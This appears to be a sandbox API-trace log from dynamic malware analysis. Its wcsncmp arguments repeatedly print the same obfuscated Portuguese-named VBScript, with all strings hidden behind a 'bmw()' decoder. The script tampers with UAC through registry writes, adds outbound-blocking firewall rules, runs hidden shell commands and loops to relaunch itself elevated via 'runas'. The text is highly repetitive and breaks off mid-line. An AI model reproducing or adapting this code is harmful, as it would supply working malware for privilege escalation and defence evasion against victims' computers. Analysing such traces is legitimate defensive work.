bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.356] wcsncmp (_String1="wRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106 [0226.356] wcsncmp (_String1="Rule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0226.356] wcsncmp (_String1="ule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0226.356] wcsncmp (_String1="le = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0226.356] wcsncmp (_String1="e = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = 